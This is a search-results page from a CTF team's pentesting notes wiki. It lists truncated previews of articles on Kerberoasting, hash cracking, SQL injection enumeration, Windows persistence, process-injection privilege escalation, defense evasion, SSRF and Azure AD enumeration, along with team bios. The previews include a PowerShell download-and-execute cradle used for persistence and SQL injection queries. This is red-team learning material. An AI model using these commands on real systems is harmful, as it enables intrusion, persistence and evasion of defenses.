Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

83 total results found

Pentesting Methodology & Notes

Articles & Writeups

About Us

https://app.hackthebox.com/public/teams/overview/5904

The Team

Articles

Azure AD (AAD)

Abusing Active Directory Certificate Services

Domain Trust Abuse

Windows Attacks and Enumerations

Web

Network Enumeration

Cracking

AD Enumeration & Exploitation

C2

Binary Exploitation

Pwn challenges cheatsheet

BobBuilder

The Team

Passion for Red Team/Pentesting and machine learning. Software Ing. HackTheBox: BobBuilder

OtterSec

The Team

I like otters... a lot ʕ •ᴥ•ʔ Currently focusing on honing my AD skills and recently got into AV/EDR evasion Find me on HackTheBox here and on VulnLab :)

serioton

The Team

I love cats, Active Directory and playing CTFs

Kerberos Attacks

Windows Attacks and Enumerations

Kerberoasting Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password. Vulnera...

Miscellaneous

Windows Attacks and Enumerations

User SID and RID In Active Directory, any group or user that Windows doesn't create has a RID of 1000 or greater. The last 8 bytes of RID determines the user's group. RID : 0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000 SID : 0x01050000000000051500...

Cracking

Cracking

Find hash type based on length Get example hashes that has length of 80 $hashes=(.\hashcat64.exe --example-hashes | where {$_.split('HASH: ')[-1].length -like 80}) Get crack type from example hashes with length 80 hashcat64.exe --example-hashes |Select-String...

SQL Injection

Web

Database enumeration MySQL SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata; SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users...

Persistence

Windows Attacks and Enumerations

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Recon

Windows Attacks and Enumerations

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

Windows Local Privilege Escalation

Windows Attacks and Enumerations

SeDebugPrivilege Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt. WinLogon PID: 3488 Adopt binary: adopt.exe PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\ado...

LueRader

The Team

Interested in everything to do with enterprise network security. Usually big fan of web and pwn too, but not very active lately.

pr0m0ly

The Team

Passionate about cybersecurity, specializing in Active Directory environments. CTF Player focused on Web, Forensics and Blockchain. You'll find me on platforms like HackTheBox and VulnLab!

Defense Evasion

Windows Attacks and Enumerations

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Server Side Request Forgery SSRF

Web

Definition Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to manipulate a server into making requests to internal or external resources, potentially gaining access to data and systems not directly reachable by the attacker. Bypass ...

Nmap cheatsheet with explanations

Network Enumeration

Always apply the best nmap scanning strategy for all size networks Scan Network Range  nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5  nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5  nmap -sn -oA tnet 10.129.2.18 10.129.2.19 10.129.2.20...

fsharp

The Team

Hey there! I'm interested in cybersecurity and I play CTFs as a hobby. My biggest interests are in reverse engineering and forensics. You can find me on CTF Discord servers (fsharp123), GitHub (G-flat), and Twitter (currently known as X; fsharp123). Personal a...

Useful links

Azure AD (AAD)

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

Overview of Azure & M365

Azure AD (AAD)

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant which represent a company (like a domain ...

Enumerate Users and Domains

Azure AD (AAD)

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

AAD Enumeration

Post-exploitation Reconnaissance

Azure AD (AAD)

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...

AAD Enumeration